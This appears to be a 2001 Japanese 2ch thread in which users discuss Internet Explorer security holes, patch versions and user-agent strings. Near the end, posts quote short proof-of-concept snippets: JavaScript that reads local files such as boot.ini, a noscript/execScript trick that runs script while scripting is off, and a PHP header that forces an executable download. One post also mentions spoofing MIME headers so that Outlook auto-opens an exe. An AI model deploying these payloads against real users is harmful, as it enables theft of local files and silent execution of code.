またIEにセキュリティホール！

>>200
漏れ、昔色々いぢって
Bozilla/4.0 (compatible; SMIE 0.1; Indows 2500
ってやったらなんか怒られた。。。

ﾜﾗﾀ

>>200
最後の Q312461)の所にパッチのバージョンが出る！ie6

USER AGENTを（ ● ´ ー ｀ ● ） にしてるよ！
しょっちゅう怒られるよ！！
（ ● ´ ー ｀ ● ） のどこがいけないんだぁ！！

>>204
ﾜﾗﾀ

USER AGENTのいじり方を教えて欲しい。

ProxyomitronとかenProxyとか

Q315000当てたけどバージョン情報でどこが変わったかわからん

>207 ありがとう！ぼくも（ ● ´ ー ｀ ● ）にするよ。

>>207
早速やってみた。
Mozilla/4.0 (compatible; MSIE 3.0; Windows 3.1)
ってやったら怒られなかったよ。

>>208
ﾌﾟﾛｸﾞﾗﾑの追加と削除に、SP１と入っていれば大丈夫です。

ところでIE5.01は見捨てられたってことだけど、Win2kSP3じゃIE関係どうなるんだろう。
確かWin2kデフォでIE5→SP2でIE5.01SP2だったと記憶しているが。

IE3.02の人は大丈夫？

分からないなら使わないほうがモアベターかモナー

今もまだ5.01sp2なんだけど大丈夫かな？
sp3を出るのを待ちたいんだけどそれまでに5.01の新穴見つからなければいいんだけど

>>215
SP3、多分でないよ・・・。出して欲しいんだけど。

私、5.5sp2なんですが、6.0の友人がＤＬでとまどってる様子なんです。
6.0の人はＤＬ後が　6.0.2600.0000 Q313675 って表示されるんですか？
それとも>>169さんみたいに、間にICって入るんですか？

IEなんて、穴だらけだよ。
寝透けの方がマシ。
まぁ、所詮「マシ」でしかないが。

>>217
IC等は入る人もいるし入らない人もいる。
過去に雑誌からIEをインストールしたことあるならICついてるかも。

>>219
なるほど〜、そういう違いなんですか。
どうもありがとうございます！

>>215
MSサイトのどこかで、IE5.5SP3とIE6.0SP1のこと書いていたけど、
5.01sp3はなかったよ

>>221
そんなぁぁぁ
そのうち出るはずだよ

>>218
最新のネスケはだいぶ良くなったよ。

6.0SP1英語版は既に流出してますな、結構セキュリティーの強化されてる。
その代わりＩＥのバージョンの所のＱなんたらは全てクリアされてしまった。

ねすけ6.2入れたけど重すぎ。IEより重かった。
どんなスペックで使ってるの？

>>225
ネスケは、起動が遅いから、常駐させて使うのがベターなんだよ。
さあ、スタートアップに登録だ。
実際は登録じゃないけど。

この前のfushianasanトラップがmemoメーリングリストで
話題になってる。
未知のセキュリティーホールだと書かれてた。
M$に早くパッチ出すように言ったほうがいいんだろうな。

>>227
2ちゃんねる発セキュリティホールかな。
それはそれでお祭りだ！ワショーイ！

ここで話題になっているパッチを当てられない件でお伺いします。
IE5.5なんですが、やはり「SP2云々」で当てられません。
SP2になっているのですが、「戻す」というのはどうすれば戻せるんでしょうか。
よろしくお願いします。

>>229
>>57あたりは読んだか？

>>230
ありがとうございます。
読んでみました。
コンパネからの「修復」はエラーが出てできませんでした。
「戻す」というのはどうするのか教えて下さい。

インターネット一時ファイルのサイズを小さくしてると
アップデイト出来ないよこともあります。
何時間格闘したことか・・・・・・・・・・・

>>231
OSがわからないので、なんとも言えんが・・
システム情報→ツールにIEの修復ツールがないかい？
それで修復ができないのなら、「以前のWindowsの構成に戻す」
で戻せると思うが。

fushianasanトラップって何？

>>234　少しは自分で検索しようよ。

fusianasanトラップになんらかの対処を
http://pc.2ch.net/test/read.cgi/sec/1008581128/

6.0にしました
が、書き込んだあと掲示板に戻らなくなった

まだ5.01Sp2なんですけど・・・ヤバイですか。

>>237
既出ではないかと思い至らない点が
相当ヤバイと思います。

>>236
ツール＞インターネットオプション＞セキュリティ＞ページの自動読み込み＞有効

>>238
234も相手にしてやって…

>238
235さんが処理済みでしたね…　スマン

＞２３９
あまちがえた、
ツール＞インターネットオプション＞セキュリティ＞レベルのカスタマイズ＞ページの自動読み込み＞有効

こんなに奥にあっては面倒でスクリプトをいちいちOFFしづらい…

>>229
俺も同じ症状だった。
IEの修復も以前のバージョンに戻すのも試してみたがダメだった。
で、結局以下の方法で修復した。

1.OSの再インストール（ﾜﾗ
2.プロバイダのアカウント等のセットアップが終わったら、
MS内のIEのサイトにアクセスし、IE5.5のセットアップファイルを落とす。
3.で、セットアップファイルを実行してIEをバージョンアップする。
んな感じかな。
もちろん最後に、修正パッチもインストールするんだけどな。

で、雑誌などのCDに収録されているIE5.5をインストールしたらダメよ。
俺の場合、それが今回のトラブルの根源だったからね。
数ヶ月前の雑誌に載っているIE5.5は、一部のファイルに問題があるみたいだし。
（雑誌収録の全部が悪いのかは俺には分からんが）

>>213
スクリプトが実行できなかったりするから問題ない気が、、、

最新情報
http://slashdot.jp/article.pl?sid=01/12/23/0728257&mode=thread

詳細求む

Σ（ﾟдﾟlll）ｶﾞｰﾝ

var y = document.open( "c:/test.txt", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );
setTimeout('alert(y.document.body.innerHTML);y.document.close();',1000);
↑これですな。
c:\test.txtというファイルを置いて↓を踏んでみよう。
http://home.austin.rr.com/wiredgoddess/thepull/fileReading.html
ファイルの内容が変数として読み出せて、
パスとファイル名さえ判ればプライバシー漏れまくり☆
スクリプトオフにしても実行できるしｗ

チョンガー凶悪ハッキングについてこレだろ。
http://www.puchiwara.com/hacking/

>>247
たちよみしたけど
なんかマンガばかりでかへってわかりづらかたよ。。。。

>>244
どーすんだよこれ！メガネ野郎とっととパッチだせ。

>>249
何だよ、ノーマルタイヤで雪道爆走するかの如く
パッチ出て無くても乗りこなすのが
MSユーザーの心意気ぢゃないか。。。

MSはあれだろ
わざと不完全を出して
そのあとのユーザーのあわてっぷりを
腹かかえて

>>250
そうなの？しらんかった・・・

>>251
くっそ−！それにしてもまじでＭＳはきらいになってきた。
ＭＳＮメッセンジャーでもよけいな常駐ソフトいれやがって。

ところで、244のページにあるリンク先サイトなんか
気味悪い。みんなみて感想プリーズ。

>>253
へ？漏れは好きだけどな。。/.
WTCテロ勃発当初は良く見に行ったよ。。。
NIMDAの時も。

www2.sala.or.jp/~uuu/dhtml/
>>253
ここのことでしょ？

>>253
大丈夫2chネラーだよ（ｗ　　モナーのゲーム
http://www2.sala.or.jp/~uuu/netrpg/

>>256
２ちゃんねらーだから心配かも。

本日、MSから私のWWWサイトへお客さんが来ました。
Agentは、見事に
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
でした。
本家ですらパッチ全部当ててない。ワショーイ。

MSNのIISもそうだなぁ。
自社製品ぐらい、完璧にパッチ当てとけYO!(藁

>>258
パッチが多すぎて無理と思われ。

>>258　そう表示させてるだけかもしれんだろ。（ｗ

インターネット・エクスプローラーに、SSLを偽装できる脆弱性
http://headlines.yahoo.co.jp/hl?a=20011225-00000005-vgb-sci

Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Q312461)
パッチあててるが、このようにひょうじされる。（ｂｙ　診断君）
ＩＥのバージョン情報では、Q3136375と表示されてるよ

普段は、ソフトで表示もされないようになってるが・・・
まあ、最近は、ＩＥ自体、ほとんど、利用せずだが
（利用頻度　オペラ、ＩＥ、ネスケ、LYNX）
２ｃｈはＡＢＯＮＥで書き込み主体

>>217
Internet Explorer 管理者キット (IEAK) 6 からインストールするとそうなります。

ちなみにIEAK５のときは記号の意味は以下のとおりでした。

IC = コンテンツ プロバイダ / 開発者
IS = サービス プロバイダ
CO = 企業内管理者

http://www.microsoft.com/japan/support/kb/articles/J051/6/55.asp

>>263
これ、「ビルド番号の末尾にIC記号が入るとき」のことです。

W32.BadtransとかのメールのMIMEヘッダーをまねしたメールを送信したら
Outlookでクリックしたら速攻exeが開かれたよ〜(ver 5.5)

ゲイツ君しっかりしてよ…

exe とオーディオファイルくらいの区別もできんのか？

6.0にしたらsageメール・ageメールを踏んどいても
色が変わらなくなった、すんげー不便

よく分からないんだけど、新しいパッチは過去のパッチの修正も含んでるの？
それとも順に全部当てないといけないのだろうか？

過去の修正も含んでいるが、防げないものもある。
fusianasanトラップは防げないらしいし、JavaScriptオフなのに
実行できる穴もふさがれない。うーん、IE穴だらけだな…。

技術的な問題はよく分からないんだけど
スクリプト完全OFF、ってブラウザを作るのは難しいの？

>>269
既出。
テキストブラウザ

>>270
ども。
テキストブラウザって画像も見れないみたいですね。
これは結構きついかな・・・。

http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to=''
attributeName=document.parentWindow.execScript(scr1.innerHTML), set1.outerHTML />
</noscript>
−−−−−
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011217_ms01-058
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011204_ie55-ext-spoof
http://www.st.ryukoku.ac.jp/~kjm/test/readme.txt
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
−−−−−
2ch でIE のセキュリティホールをつく「fusianasanトラップ」が蔓延
https://www.netsecurity.ne.jp/article/1/3581.html
http://java-house.jp/ml/archive/j-h-b/032585.html
http://memo.st.ryukoku.ac.jp/archive/200112.month/2392.html
<script>
var x=window.open('file://C:/boot.ini');
x.navigate("javascript:alert(document.body.innerText)");
</script>

>>272 ：「 mcn-cm1d1130.miyazaki-catv.ne.jpトラップ」が蔓延

「 fusianasanトラップ」が蔓延　って書きたかったのか？

>>265
＞W32.BadtransとかのメールのMIMEヘッダーをまねしたメールを送信したら
＞Outlookでクリックしたら速攻exeが開かれたよ〜(ver 5.5)

Badtrans自体そうでしょ…　scrはexeにしても動くはずだよ、pifもいけました。
comもいけたよ！

＞ゲイツ君しっかりしてよ…

ＭＳのプログラマーは厨房以下と思われ

>>273
自爆尊敬 age

>>271
w3m + パッチ で画像も見える。
w3mマンセー。

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20011225/1/
　注意しなければならないのは，「MS01-058」に対しては，
IE 5.5 SP2 および IE 6 用のパッチしか用意されていないことだ。
これは，IE 5.5 SP2 および IE 6 以外のバージョンでは問題がないということではなく，
これらより前のバージョンはサポート対象外となっているために
パッチが用意されていないのである。

　「Badtrans.B」などが悪用する過去のセキュリティ・ホールは
IE 5.01 SP2 でふさがれているが，「MS01-058」のセキュリティ・ホールは存在している。
IE 5.5 SP2 あるいは IE 6 以外のユーザーは早急にバージョン・アップするとともに，
パッチを適用する必要がある。「今週のSecurity Check [Windows編]」で解説しているように，
「IE 5.5 SP2 ＋ 『MS01-058』パッチ」あるいは「IE 6 ＋『MS01-058』パッチ」
以外のバージョンは，セキュリティ的に使用不能なのである。

http://www.microsoft.com/JAPAN/support/kb/articles/JP313/6/75.asp

ダウソはここから
http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp

既出でしたらすみません。
Pen�U433MHzメモリ192MB
の自分ですが5.5と6.0のsp2どっちがいいでしょうか？

タブブラウザを常用しているのであまり遅い速いは関係ないと思うのですが
AAがズレるのだけはカンベンしていただきたいです。
でもパッチをあてても致命的な穴は6.0の方が多いんですか？

>>279
新しい場所へ進んでいる分、6の方が危険性は高い…

２０００を使っていますがすごいことになっています。
パッチの当て方が分かりません。

　

汚染を除去しました。

>>280
ありがとうございます。
5.5sp2ってAAどうですか？
友達んちがMe5.5sp2だったんだけど、それで見たら汚くズレてたんですが。
283ってなんですか？

CEは問題ないのか？
いまだにＰＩＥ３やＩＥ４だぞ・・・

>285
全く問題ありません。万が一、調子が悪くなっても、簡単にリセット可能。
メール，webに限れば、ある意味最強！

ちなみに、ＩＥ４ではなく、ＩＥ４相当のＩＥ for ＣＥ。

5.5SP2にバージョンアップした後、Windows Updateに行くと
重要な更新で、セキュリティ関係の修正が二つ表示されて
たので（>>227含む）二つともインストール完了。
これで5.5が出てから今までに公開された5.5のセキュリティ
修正パッチは全部充てたってことになるんですか？

追記
5.01SP2からバージョンアップしました。

>>287
あれは未対応
ＯＳのとＩＥの一つずつが最新の修正。

>>287
2chのAAはズレませんか？
レポートお願いします

>>283
トロイの木馬でしょ？
なんで放置されてるんだ？
この板を開くたびにscanが反応するぞ〜

age

sage

追い出し完了

φ(｀д´)ｶｷｶｷ

Infe.....ヽ(`Д´)ﾉｳﾜｧｧｧﾝ

http://www.heise.de/ct/browsercheck/readme.txt
>>291 別にソース書いてあるだけだから、問題ないと思われ。

>>296
そうなんだ・・・
厨房でごまんなさい

激しく遅レスでｽﾏｿ。
>>289
さんきう。
実はレス番号を>>277とするところを、間違えて>>227と
してしまった。（ｗ
で、>>287の件は、よく分からんかったので一旦5.01に
戻し、再度5.5にしてMSのセキュリティーセンターに載ってた
順番に修正プログラムを入れた後、重要な更新に飛んで、そ
こで表示された修正プログラムも入れました。

>>290
AAの表情が変わったとは思うけど、特に「ずれてる！」って事は
ないなあ。
ttp://www.skipup.com/~niwatori/index4.htmの真中にある
「■顔文字（AA）について」を参考にして、フォントは変更しました。

>>298
ご丁寧にありがとうございました。
きちんと変更すれば問題ないんですね。
ということは、6.0sp1が出るまでは5.5sp2の方が無難ですよね・・・？

もし何かあったときに、6.0から5.5にするのと、5.5から6.0にするのでは
どっちがより問題ないんですか？

>>299
詳しくは無いけど、がんばってレスをしてみる。
6.0→5.5と5.5→6.0を単純に考えると、5.5→6.0の方が問題ないと思う。